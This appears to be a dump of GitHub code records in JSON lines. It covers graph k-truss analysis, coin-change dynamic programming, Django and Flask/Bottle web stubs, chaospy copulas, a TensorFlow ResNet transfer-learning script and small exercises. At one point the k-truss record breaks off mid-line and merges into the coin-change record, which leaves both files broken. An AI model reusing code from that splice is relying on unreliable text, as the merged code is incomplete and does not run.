+{"seq_id":"39092483466","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nmylist = ['мяч', 'палка', 'луна', 'садик', 'дерево', 'небо']\ns = input(\"Введите элемент списка \")\n\nif s not in mylist:\n print(\"Такого элемента в списке нет\")\nelse:\n print(mylist.index(s))\n","repo_name":"AlexandrM333/labrab6","sub_path":"Задания/zadan1.py","file_name":"zadan1.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11432892028","text":"import sys\nimport time\nfrom os import listdir\nfrom os.path import isfile, join\nimport networkx as nx\nfrom igraph import *\nimport igraph as ix\nimport matplotlib.pyplot as plt\nimport scipy.io as spio\nimport pandas as pd\n#from utils import *\n\n\ncolorlist = {0:\"red\", 1:\"orange\", 2:\"green\",3:\"yellow\", 4:\"pink\",5:\"blue\", 6:\"azure\",7:\"cyan\",8:\"magenta\",9:\"purple\",10:\"white\",\\\n 11:\"peru\",12:\"sienna\",13:\"navy\",14:\"tomato\",15:\"violet\",16:\"plum\",17:\"thistle\",18:\"orchid\",19:\"beige\",20:\"tan\",\\\n 21:\"orchid\",22:\"lavender\",23:\"goldenrod\",24:\"khaki\",25:\"grey\",26:\"ivory\",27:\"salmon\",28:\"royalblue\",29:\"limegreen\",30:\"seagreen\",\\\n 31:\"burlywood\",32:\"coral\",33:\"black\",34:\"sandybrown\",35:\"firebrick\"\\\n }\n\ndef triangles(G,nodes=None):\n if nodes is None:\n nodes_nbrs = G.adj.items()\n else:\n nodes_nbrs= ( (n,G[n]) for n in G.nbunch_iter(nodes) )\n for v,v_nbrs in nodes_nbrs:\n vs=set(v_nbrs) -set([v])\n ntriangles=0\n for w in vs:\n ws=set(G[w])-set([w])\n ntriangles+=len(vs.intersection(ws))\n yield (v,len(vs),ntriangles)\n\ndef edge_support(G):\n neighbors=G.neighborhood() #neighbors_iter\n nbrs=dict((v.index,set(neighbors[v.index])) for v in G.vs)\n support = {}\n for e in G.es:\n nod1,nod2 = e.source, e.target\n nod1_nbrs = set(nbrs[nod1])-set([nod1])\n nod2_nbrs = set(nbrs[nod2])-set([nod2])\n sup = len(nod1_nbrs.intersection(nod2_nbrs))\n #G[nod1][nod2]['support'] = sup\n support[(nod1,nod2)] = sup\n #print 'support :', support\n return support\n\ndef ktruss(G):\n #G = G.simplify() #assume graph is simple\n #G.to_undirected(mode=False)\n support = edge_support(G)\n edges=sorted(support,key=support.get)\n bin_boundaries=[0]\n curr_support=0\n for i,e in enumerate(edges):\n if support[e]>curr_support:\n 
bin_boundaries.extend([i]*(support[e]-curr_support))\n curr_support=support[e]\n\n edge_pos = dict((e,pos) for pos,e in enumerate(edges))\n #print 'edge-pos:',edge_pos\n truss={} ## initial guesses for truss is support\n neighbors=G.neighborhood() #neighbors_iter\n #print 'neighbors:', neighbors\n nbrs=dict((v.index,(set(neighbors[v.index])-set([v.index]))) for v in G.vs)\n #nbrs=dict((v.index,set(neighbors[v.index])) for v in G.vs)\n #print 'nbrs:', nbrs\n for e in edges:\n #print 'processing edge : ', e, 'support :', support[e], 'pos:', edge_pos[e]\n u,v =e[0], e[1]\n if not(u == v) :\n common_nbrs = set(nbrs[u]).intersection(nbrs[v])\n #print u,v,'common_nbrs',common_nbrs\n for w in common_nbrs:\n if (u,w) in support :\n e1 = (u,w)\n else :\n e1 = (w,u)\n if (v,w) in support :\n e2 = (v,w)\n else:\n e2 = (w,v)\n pos=edge_pos[e1]\n if support[e1] > support[e] :\n bin_start=bin_boundaries[support[e1]]\n edge_pos[e1]=bin_start\n edge_pos[edges[bin_start]]=pos\n edges[bin_start],edges[pos]=edges[pos],edges[bin_start]\n bin_boundaries[support[e1]]+=1\n #print 'e1',e1,'support:',support[e1], 'pos:', pos, 'new pos:', edge_pos[e1]\n\n pos=edge_pos[e2]\n if support[e2] > support[e] :\n bin_start=bin_boundaries[support[e2]]\n edge_pos[e2]=bin_start\n edge_pos[edges[bin_start]]=pos\n edges[bin_start],edges[pos]=edges[pos],edges[bin_start]\n bin_boundaries[support[e2]]+=1\n #print 'e2',e2,'support:',support[e2], 'pos:', pos, 'new pos:', edge_pos[e2]\n\n support[e1] = max(support[e], support[e1]-1)\n support[e2] = max(support[e], support[e2]-1)\n\n truss[e] = support[e] + 2\n nbrs[u].remove(v)\n nbrs[v].remove(u)\n #print 'Truss: ', truss\n #print 'Sorted Truss: ', sorted(truss,key=truss.get)\n return truss\n\n\ndef get_ktrussProbs(g, name):\n print (\"Extracting KTruss features: %s\" % name)\n trussness = ktruss(g).values()\n n = len(trussness)\n d = {n:trussness.count(n) for n in range(2,max(trussness)+1)}\n ktrussprobability = [d[key] / (n * 1.0) for key in sorted(d)]\n return (ktrussprobability)\n\ndef getnodetrussness(graph):\n # Me\n dict_node_truss = {}\n n = graph.vcount()\n ktrussdict = ktruss(graph)\n nodetruss = [0] * n\n for edge in graph.es:\n source = edge.source\n target = edge.target\n if not (source == target) :\n t = ktrussdict[(source,target)]\n else:\n t = 0\n nodetruss[source] = max(nodetruss[source], t)\n nodetruss[target] = max(nodetruss[target], t)\n \n \n\n return nodetruss\n\t\ndef getnodetrussnessdict(graph):\n sr_node_ktruss_dict = {} \n n = graph.vcount()\n ktrussdict = ktruss(graph)\n nodetruss = [0] * n\n for edge in graph.es:\n source = edge.source\n target = edge.target\n if not (source == target) :\n t = ktrussdict[(source,target)]\n else:\n t = 0\n nodetruss[source] = max(nodetruss[source], t)\n nodetruss[target] = max(nodetruss[target], t)\n d = {}\n node_index = 0\n node_truss_value = 0\n while (node_index int:\n memo = [0] * (target + 1)\n\n def f(coins: list, target: int) -> int:\n # Base cases\n if target == 0:\n return 1\n if target < 0:\n return 0\n\n # Already computed result\n if memo[target] > 0:\n return memo[target]\n\n count = 0\n for coin in coins:\n diff = target - coin\n if diff >= 0:\n count += f(coins, diff)\n\n memo[target] = count\n return count\n\n return f(coins, target)\n\n\ndef count_max_num_coins(coins: list, target: int) -> int:\n memo = [-1] * (target + 1)\n\n def f(coins: list, target: int) -> int:\n # Base case\n if target == 0:\n return 0\n\n # Already computed result\n if memo[target] >= 0:\n return memo[target]\n\n max_coins = -1\n\n 
# Loop over the different coins available\n for coin in coins:\n diff = target - coin\n # Skip a coin if its value is less than amount\n # remaining `diff`\n if diff >= 0:\n curr_max_coins = f(coins, diff)\n if curr_max_coins > max_coins:\n max_coins = curr_max_coins\n\n # Add back the coin removed recursively\n memo[target] = max_coins + 1\n return memo[target]\n\n ans = f(coins, target)\n return ans if ans <= MAX_INT else -1\n\n\ndef count_min_num_coins(coins: list, target: int) -> int:\n memo = [-1] * (target + 1)\n\n def f(coins: list, target: int) -> int:\n # Base case\n if target == 0:\n return 0\n\n # Already computed result\n if memo[target] >= 0:\n return memo[target]\n\n min_coins = MAX_INT\n\n # Loop over the different coins available\n for coin in coins:\n diff = target - coin\n # Skip a coin if its value is greater than amount\n # remaining `diff`\n if diff >= 0:\n curr_min_coins = f(coins, diff)\n if curr_min_coins < min_coins:\n min_coins = curr_min_coins\n\n # Add back the coin removed recursively\n memo[target] = min_coins + 1\n return memo[target]\n\n ans = f(coins, target)\n return ans if ans <= MAX_INT else -1\n\n\ndef all_changes(coins: list, target: int) -> int:\n pass\n\n\ndef max_coins_change(coins: list, target: int) -> int:\n pass\n\n\ndef min_coins_change(coins: list, target: int) -> int:\n pass\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Making change\")\n print(\"-\" * 60)\n\n coins = [1, 2, 5, 10, 25]\n test_cases = [\n (coins, 1),\n (coins, 2),\n (coins, 5),\n (coins, 6),\n (coins, 16),\n (coins, 26),\n (coins, 49),\n ([2, 6], 13),\n (coins, 888),\n ]\n\n for coins, target in test_cases:\n\n print(\"Coins:\", coins, \"\\tTarget:\", target)\n print(\"Number of possible change combinations\", count_ways(coins, target))\n print(\"Minimum number of coins\", count_min_num_coins(coins, target))\n print(\"Maximum number of coins\", count_max_num_coins(coins, target))\n\n print()\n\n # print(\"\\n>>> Custom jumps\")\n # steps = 20\n # jumps = [1, 3]\n # print(\"\\nsteps:\", steps)\n # print(\"jumps:\", jumps)\n # print(\"Ways count:\", dp_iterative_custom_jumps(steps, jumps))\n # steps = 20\n # jumps = [3, 6]\n # print(\"\\nsteps:\", steps)\n # print(\"jumps:\", jumps)\n # print(\"Ways count:\", dp_iterative_custom_jumps(steps, jumps))\n","repo_name":"daalgi/algorithms","sub_path":"dynamic_programming/make_change/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21828596092","text":"\"\"\"Base module for system services\"\"\"\nfrom abc import abstractmethod\n\nfrom appcore.domain.models.model_core import ModelCore\n\n\n# pylint: disable=too-few-public-methods\nclass ServiceCore:\n \"\"\"Base service for app services\"\"\"\n\n # pylint: disable=too-few-public-methods\n class Meta:\n \"\"\"Service core metaclass\"\"\"\n abstract = True\n\n @abstractmethod\n def execute(self, validate_data: dict) -> ModelCore:\n \"\"\"execute service function\"\"\"\n","repo_name":"NelsonManuelGM/django-core","sub_path":"appcore/domain/services/service_core.py","file_name":"service_core.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10746955548","text":"r\"\"\"\nA cumulative distribution function of an independent multivariate random\nvariable can be made dependent through a copula as follows:\n\n.. 
math::\n F_{Q_0,\\dots,Q_{D-1}} (q_0,\\dots,q_{D-1}) =\n C(F_{Q_0}(q_0), \\dots, F_{Q_{D-1}}(q_{D-1}))\n\nwhere :math:`C` is the copula function, and :math:`F_{Q_i}` are marginal\ndistribution functions. One of the more popular classes of copulas is the\nArchimedean copulas.\n.. \\cite{sklar_random_1996}.\nThey are defined as follows:\n\n.. math::\n C(u_1,\\dots,u_n) =\n \\phi^{[-1]} (\\phi(u_1)+\\dots+\\phi(u_n)),\n\nwhere :math:`\\phi` is a generator and :math:`\\phi^{[-1]}` is its\npseudo-inverse. Support for Archimedean copulas in `chaospy` is possible\nthrough reformulation of the Rosenblatt transformation. In two dimension, this\nreformulation is as follows:\n\n.. math::\n\n F_{U_0}(u_0) = \\frac{C(u_0,1)}{C(1,1)}\n\n F_{U_1\\mid U_0}(u_1\\mid u_0) =\n \\frac{\\tfrac{\\partial}{\\partial u_0}\n C(u_0,u_1)}{\\tfrac{\\partial}{\\partial u_0} C(u_0,1)}\n\nThis definition can also be generalized in to multiple variables using the\nformula provided by Nelsen 1999.\n.. cite:: nelsen_introduction_1999\n\nThe definition of the Rosenblatt transform can require multiple\ndifferentiations. An analytical formulation is usually not feasible, so the\nexpressions are estimated using difference scheme similar to the one outlined\nfor probability density function defined in :ref:`distributions`. The accurate\nmight therefore be affected.\n\nSince copulas are meant as a replacement for Rosenblatt\ntransformation, it is usually assumed that the distribution it is\nused on is stochastically independent.\nHowever in the definition of a copula does not actually require it, and sine\nthe Rosenblatt transformation allows for it, multiple copulas can be stacked\ntogether in `chaospy`.\n\"\"\"\nimport numpy as np\n\nfrom ..backend import Dist\n\nclass Copula(Dist):\n\n def __init__(self, dist, trans):\n \"\"\"\n Args:\n dist (Dist) : Distribution to wrap the copula around.\n trans (Dist) : The copula wrapper `[0,1]^D \\into [0,1]^D`.\n \"\"\"\n Dist.__init__(self, dist=dist, trans=trans,\n _advance=True, _length=len(trans))\n\n def _cdf(self, x, G):\n dist, trans = G.D[\"dist\"], G.D[\"trans\"]\n q = G(G(x, dist), trans)\n return q\n\n def _bnd(self, x, G):\n return G(x, G.D[\"dist\"])\n\n def _ppf(self, q, G):\n dist, trans = G.D[\"dist\"], G.D[\"trans\"]\n return G(G(q, trans), dist)\n\n def _pdf(self, x, G):\n dist, trans = G.D[\"dist\"], G.D[\"trans\"]\n return G(G.fwd_as_pdf(x, dist), trans)*G(x, dist)\n\n\nclass Archimedean(Dist):\n \"\"\"\n Archimedean copula superclass.\n\n Subset this to generate an archimedean.\n \"\"\"\n\n def _ppf(self, x, th, eps):\n\n for i in range(1, len(x)):\n\n q = x[:i+1].copy()\n lo, up = 0,1\n dq = np.zeros(i+1)\n dq[i] = eps\n flo, fup = -q[i],1-q[i]\n\n for iteration in range(1, 10):\n fq = self._diff(q[:i+1], th, eps)\n dfq = self._diff((q[:i+1].T+dq).T, th, eps)\n dfq = (dfq-fq)/eps\n dfq = np.where(dfq==0, np.inf, dfq)\n\n fq = fq-x[i]\n if not np.any(np.abs(fq)>eps):\n break\n\n # reduce boundaries\n flo = np.where(fq<=0, fq, flo)\n lo = np.where(fq<=0, q[i], lo)\n\n fup = np.where(fq>=0, fq, fup)\n up = np.where(fq>=0, q[i], up)\n\n # Newton increment\n qdq = q[i]-fq/dfq\n\n # if new val on interior use Newton\n # else binary search\n q[i] = np.where((qdqlo),\n qdq, .5*(up+lo))\n\n x[i] = q[i]\n return x\n\n\n def _cdf(self, x, th, eps):\n out = np.zeros(x.shape)\n out[0] = x[0]\n for i in range(1,len(x)):\n out[i][x[i]==1] = 1\n out[i] = self._diff(x[:i+1], th, eps)\n\n return out\n\n def _pdf(self, x, th, eps):\n out = np.ones(x.shape)\n sign = 1-2*(x>.5)\n for i 
in range(1,len(x)):\n x[i] += eps*sign[i]\n out[i] = self._diff(x[:i+1], th, eps)\n x[i] -= eps*sign[i]\n out[i] -= self._diff(x[:i+1], th, eps)\n out[i] /= eps\n\n out = abs(out)\n return out\n\n def _diff(self, x, th, eps):\n \"\"\"\n Differentiation function.\n\n Numerical approximation of a Rosenblatt transformation created from\n copula formulation.\n \"\"\"\n foo = lambda y: self.igen(np.sum(self.gen(y, th), 0), th)\n\n out1 = out2 = 0.\n sign = 1 - 2*(x>.5).T\n for I in np.ndindex(*((2,)*(len(x)-1)+(1,))):\n\n eps_ = np.array(I)*eps\n x_ = (x.T + sign*eps_).T\n out1 += (-1)**sum(I)*foo(x_)\n\n x_[-1] = 1\n out2 += (-1)**sum(I)*foo(x_)\n\n out = out1/out2\n return out\n\n\n def _bnd(self, **prm):\n return 0,1\n","repo_name":"davidovitch/chaospy","sub_path":"src/chaospy/dist/copulas/baseclass.py","file_name":"baseclass.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"12198627562","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/10/14 15:06\n# @Author : yangmingming\n# @Site : \n# @File : main.py\n# @Software: PyCharm\n\nfrom flask import Flask\nfrom config import DevConfig\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config.from_object(DevConfig)\n\n\n@app.route('/')\ndef home():\n return \"hello word\"\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Jsonming/flask_learn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2279699106","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020-03-19 07:29:51\n# @Author : mutudeh (josephmathone@gmail.com)\n# @Link : ${link}\n# @Version : $Id$\n\nimport os\n\nclass Solution(object):\n # 使用栈进行求解\n def lengthLongestPath(self, input):\n if '.' not in input:\n return 0\n input = input.split('\\n')\n depth_file = []\n for tem in input:\n depth = tem.count('\\t')\n # 消除括号,只保留文件名\n depth_file.append([depth,tem[depth:]])\n\n print(depth_file)\n def cal_len(stack):\n length = 0\n for i in stack:\n # +1 means plus '/'\n length += len(i[1]) +1\n return length - 1\n\n # stack is to store the path with asceding \\t from bottom to top\n stack = []\n max_length = 0\n for tem in depth_file:\n while stack and tem[0] <= stack[-1][0]:\n stack.pop()\n stack.append(tem)\n # if the current string contains '.', it means we reach the bottom of one path\n if '.' 
in tem[1]:\n max_length = max(max_length,cal_len(stack))\n return max_length\n\ns = Solution()\nprint(s.lengthLongestPath(\"dir\\n file.txt\"))\n\n\n\n","repo_name":"joseph-mutu/Codes-of-Algorithms-and-Data-Structure","sub_path":"Leetcode/[388]文件的绝对的长度.py","file_name":"[388]文件的绝对的长度.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36472326696","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Family',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('family_name', models.CharField(max_length=200)),\n ('street_address1', models.CharField(max_length=200)),\n ('street_address2', models.CharField(blank=True, max_length=200)),\n ('zip_code', models.IntegerField(validators=[django.core.validators.RegexValidator(regex='^\\\\d{5}$', message='Please enter a five-digit ZIP code.')])),\n ('home_phone', models.IntegerField(blank=True, validators=[django.core.validators.RegexValidator(regex='^\\\\d{10}$', message='Please enter a ten-digit phone number.')], null=True)),\n ('last_paid', models.DateField(verbose_name='date dues paid')),\n ('dues_amount', models.PositiveSmallIntegerField()),\n ('comment', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('last_name', models.CharField(max_length=200)),\n ('first_name', models.CharField(max_length=200)),\n ('email', models.EmailField(blank=True, max_length=254, validators=[django.core.validators.EmailValidator()], null=True)),\n ('personal_phone', models.IntegerField(blank=True, validators=[django.core.validators.RegexValidator(regex='^\\\\d{10}$', message='Please enter a ten-digit phone number.')], null=True)),\n ('family', models.ForeignKey(to='membership.Family')),\n ],\n ),\n ]\n","repo_name":"dscush/friendsgpl","sub_path":"membership/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16523776213","text":"# Marketplace Product Registration Page\nVERSION = '0.0.1'\nBOTTLEIP = '0.0.0.0'\nBOTTLEPORT = '13175'\n\n# Install Requrirements via PIP\nfrom bottle import Bottle, route, get, post, request, response, run, static_file, template # Webserver\n\n#------------------------------------------------------------------\n# Setup the Bottle WebServer\n#------------------------------------------------------------------\napp = Bottle(__name__)\n\n@app.hook('after_request')\ndef enable_cors():\n\t \"\"\"\n You need to add some headers to each request.\n Don't use the wildcard '*' for Access-Control-Allow-Origin in production.\n \"\"\"\n\t response.headers['Access-Control-Allow-Origin'] = '*'\n\t response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n\t response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n#------------------------------------------------------------------\n# Index Endpoint\n#------------------------------------------------------------------\n\n# Index 
Route\n@app.route('/', method='GET')\ndef index():\n print(request)\n return {'status':200, 'response':'Connection to the CloudMage API has been successfully established'}\n\n# Logo Route\n# @app.route('/logo', method='GET')\n# def logo():\n# \treturn static_file('images/logo.png', root='.', mimetype='image/png')\n\n# # EULA Route\n# @app.route('/eula', method='GET')\n# def eula():\n# \treturn template('eula')\n\n# # Registration Form Route\n@app.route('/pr', method='POST')\ndef MergeRequest():\n\t\n if 'action' in request.forms:\n pr_action = request.forms.get('action')\n print(pr_action)\n \n if 'number' in request.forms:\n pr_number = request.forms.get('number')\n print(pr_number)\n\n # This should return back as an object\n if 'changes' in request.forms:\n pr_change_obj = request.forms.get('changes')\n print(pr_change_obj)\n\n # This should also return back as an object\n if 'pull_request' in request.forms:\n pr_obj = request.forms.get('pull_request')\n print(pr_obj)\n\n return {'status':200, 'response':'Connection to the CloudMage PR API has been successfully established'}\n\n# # Submit Registration\n# @app.route('/process', method='POST')\n# def process_registration():\n \n# if 'email' in request.forms:\n# email = request.forms.get('email')\n\n# if 'username' in request.forms:\n# username = request.forms.get('username')\n \n# if 'password' in request.forms:\n# password = request.forms.get('password')\n\n# if 'domain_name' in request.forms:\n# domain_name = request.forms.get('domain_name')\n \n# ##### Resolving Customer Registration Token ##### \n# if 'mp_reg' in request.forms:\n# mptoken = request.forms.get('mp_reg')\n\n# # Resolve Customer via Marketplace Metering Service\n# marketplaceClient = boto3.client(\n# 'meteringmarketplace',\n# region_name='us-east-1'\n# )\n \n# customerData = marketplaceClient.resolve_customer(\n# RegistrationToken=mptoken\n# )\n \n# product_id = customerData['ProductCode']\n# customer_id = customerData['CustomerIdentifier']\n \n# form_data = {\n# \"email\": email,\n# \"username\": username,\n# \"password\": password,\n# \"domain_name\": domain_name,\n# \"mptoken\": mptoken,\n# \"product_id\": product_id,\n# \"customer_id\": customer_id\n# }\n\n# # TODO: Validate no other accounts share this identifier\n# # TODO: Store information away with your customer record\n\n# return template('formdata', form_data=form_data)\n\n#------------------------------------------------------------------ \n# Start the Web Server \n#------------------------------------------------------------------ \n# Run the flask server \nif __name__ == '__main__': \n app.run(host=BOTTLEIP, port=BOTTLEPORT) \n\n","repo_name":"dabombcloud/GithubListener","sub_path":"BottleListener.py","file_name":"BottleListener.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27689777975","text":"## method is from Udacity course\n\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport skimage.transform\nfrom six.moves import cPickle as pickle\nfrom six.moves import range\nfrom scipy.misc import imresize\nimport shutil\n\nlog_dir = '/tmp/tensorflow/Fish/logs/summaries'\ntry:\n shutil.rmtree(log_dir)\nexcept:\n print(log_dir+' is empty!')\ndropout = 0.5\nbatch_size = 60\npatch_size = 9\ndepth = 8\nnum_hidden = 32\nnum_class = 3\n## load data\npickle_file = 
'FishSResNet.pickle'\nprint(\"Loading data..\")\nwith open(pickle_file, 'rb') as f:\n save = pickle.load(f)\n train_dataset = save['train_dataset']\n train_labels = save['train_labels']\n valid_dataset = save['valid_dataset']\n valid_labels = save['valid_labels']\n test_dataset = save['test_dataset']\n test_labels = save['test_labels']\n del save # hint to help gc free up memory\n print('Training set', train_dataset.shape, train_labels.shape, np.mean(train_dataset), np.std(train_dataset))\n print('Validation set', valid_dataset.shape, valid_labels.shape)\n print('Test set', test_dataset.shape, test_labels.shape)\n\n# reformat\ndef reformat(dataset, labels):\n labels = (np.arange(num_class) == labels[:, None]).astype(np.float32)\n return dataset, labels\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\ntrain_dataset, train_labels = reformat(train_dataset, train_labels)\nvalid_dataset, valid_labels = reformat(valid_dataset, valid_labels)\ntest_dataset, test_labels = reformat(test_dataset, test_labels)\nprint('Training set', train_dataset.shape, train_labels.shape, np.mean(train_dataset), np.std(train_dataset))\nprint('Validation set', valid_dataset.shape, valid_labels.shape)\nprint('Test set', test_dataset.shape, test_labels.shape)\n# Create a multilayer model.\nsess = tf.InteractiveSession()\n\n# load current structure\nnew_saver = tf.train.import_meta_graph('ResNet-L50.meta')\nnew_saver.restore(sess, './ResNet-L50.ckpt')\n\ngraph = tf.get_default_graph()\n\n# add transfer learning layer\npooling_tensor = graph.get_tensor_by_name(\"avg_pool:0\")\n\n# Input placeholders\nwith tf.name_scope('input'):\n x = graph.get_tensor_by_name(\"images:0\")\n y_ = tf.placeholder(tf.float32, shape=(batch_size, num_class), name='y-input-Labels')\n tf.summary.image('input', x, 10)\n\n\nwith tf.name_scope('avg_pooling'):\n variable_summaries(pooling_tensor)\n# retain: from pooling to fc\nwith tf.name_scope('dropout1'):\n keep_prob = tf.placeholder(tf.float32)\n tf.summary.scalar('dropout_keep_probability1', keep_prob)\n dropped = tf.nn.dropout(pooling_tensor, keep_prob)\nwith tf.name_scope('trans_fc') as scope:\n fcw = tf.Variable(tf.truncated_normal([2048, num_class], dtype=tf.float32, stddev=0.01), trainable=True, name='weights')\n fcb = tf.Variable(tf.constant(0.0, shape=[num_class], dtype=tf.float32), trainable=True, name='biases')\n y = tf.nn.bias_add(tf.matmul(dropped, fcw), fcb)\n variable_summaries(y)\n\n\n\nwith tf.name_scope('cross_entropy'):\n # The raw formulation of cross-entropy,\n #\n # tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.softmax(y)),\n # reduction_indices=[1]))\n #\n # can be numerically unstable.\n #\n # So here we use tf.nn.softmax_cross_entropy_with_logits on the\n # raw outputs of the nn_layer above, and then average across\n # the batch.\n diff = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y)\n variable_summaries(y)\n #variable_summaries(diff)\n with tf.name_scope('total'):\n cross_entropy = tf.reduce_mean(diff)\ntf.summary.scalar('cross_entropy', cross_entropy)\n\nwith tf.name_scope('train'):\n train_step = 
tf.train.AdamOptimizer(0.00001).minimize(cross_entropy, var_list=[fcw, fcb])\n\nwith tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntf.summary.scalar('accuracy', accuracy)\n\n# Merge all the summaries and write them out to\n# /tmp/tensorflow/mnist/logs/mnist_with_summaries (by default)\nmerged = tf.summary.merge_all()\ntrain_writer = tf.summary.FileWriter(log_dir + '/train', sess.graph)\ntest_writer = tf.summary.FileWriter(log_dir + '/test')\n\nprint('init..')\ntf.global_variables_initializer().run()\nnew_saver.restore(sess, './ResNet-L50.ckpt')\n#init_vars_op = tf.variables_initializer([fcw,fcb])\n#sess.run(init_vars_op)\n\n# Train the model, and also write summaries.\n# Every 10th step, measure test-set accuracy, and write test summaries\n# All other steps, run train_step on training data, & add training summaries\n#print(tf.global_variables())\n\nfor i in range(8001):\n offset = (i * batch_size) % (train_labels.shape[0] - batch_size)\n batch_data = train_dataset[offset:(offset + batch_size), :, :, :]\n batch_labels = train_labels[offset:(offset + batch_size), :]\n # print(batch_data[0])\n # print(\"max,min\", np.max(batch_data[0]), np.min(batch_data[0]))\n if i % 10 == 0: # Record summaries and valid-set accuracy\n feed_dict = {x: valid_dataset, y_: valid_labels, keep_prob: 1}\n print(\"max,min\", np.max(valid_dataset[0]), np.min(valid_dataset[0]))\n summary, acc,ap = sess.run([merged, accuracy,pooling_tensor], feed_dict=feed_dict)\n test_writer.add_summary(summary, i)\n print('Accuracy at step %s: %s' % (i, acc))\n print('ap shape: ', ap.shape)\n print(\"max,min\", np.max(ap[0]), np.min(ap[0]))\n else: # Record train set summaries, and train\n feed_dict = {x: batch_data, y_: batch_labels, keep_prob: 0.5}\n if i % 100 == 99: # Record execution stats\n run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n summary, _ = sess.run([merged, train_step],\n feed_dict=feed_dict,\n options=run_options,\n run_metadata=run_metadata)\n train_writer.add_run_metadata(run_metadata, 'step%03d' % i)\n train_writer.add_summary(summary, i)\n print('Adding run metadata for', i)\n else: # Record a summary\n summary, _ = sess.run([merged, train_step], feed_dict=feed_dict)\n train_writer.add_summary(summary, i)\nsaver = tf.train.Saver()\nsave_path = saver.save(sess, \"/tmp/ResNet/Weight.ckpt\")\nprint(\"Model saved in file: %s\" % save_path)\ntrain_writer.close()\ntest_writer.close()","repo_name":"frostinassiky/Stereo-Biomass-Estimation","sub_path":"FishRecognise/ResNet/FishRecBoardResNet.py","file_name":"FishRecBoardResNet.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25861029963","text":"\"Valid Palindrome\"\n\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n i = 0\n j = len(s) - 1\n while i < j:\n if not s[i].isalnum():\n i += 1\n continue\n if not s[j].isalnum():\n j -= 1\n continue\n if s[i].lower() != s[j].lower():\n return False\n else:\n i += 1\n j -= 1\n return True\nprint(Solution.isPalindrome(Solution, \"A man, a plan, a canal: 
Panama\"))\n","repo_name":"lwd19861127/LeetCde-TopInterviewQuestions-Easy","sub_path":"IntroToAlgorithms/LeetCode/String/ValidPalindrome.py","file_name":"ValidPalindrome.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42465574002","text":"import random\n\nrare_table = {\n 1: 'uncommon',\n 2: 'rare',\n 3: 'epic',\n 4: 'legendary'\n}\n\nclass ColdWeapon:\n def __init__(self, name: str, rare: int, damage_by_rare):\n self.name = name\n self.rare = rare\n self.damage = damage_by_rare[self.rare]\n \n def __str__(self) -> str:\n return f'{self.name} : Rare: {self.rare} : Damage: {self.damage}'\n\nclass Knife(ColdWeapon):\n def __init__(self, rare):\n ColdWeapon.__init__(self, 'Knife', rare, {\n 1:1,# uncommon \n 2:5,# rare \n 3:8,# epic \n 4:13# legendary\n })\n \nclass Crowbar(ColdWeapon):\n def __init__(self,rare):\n ColdWeapon.__init__(self, 'Crowbar', rare, {\n 1:3,# uncommon \n 2:4,# 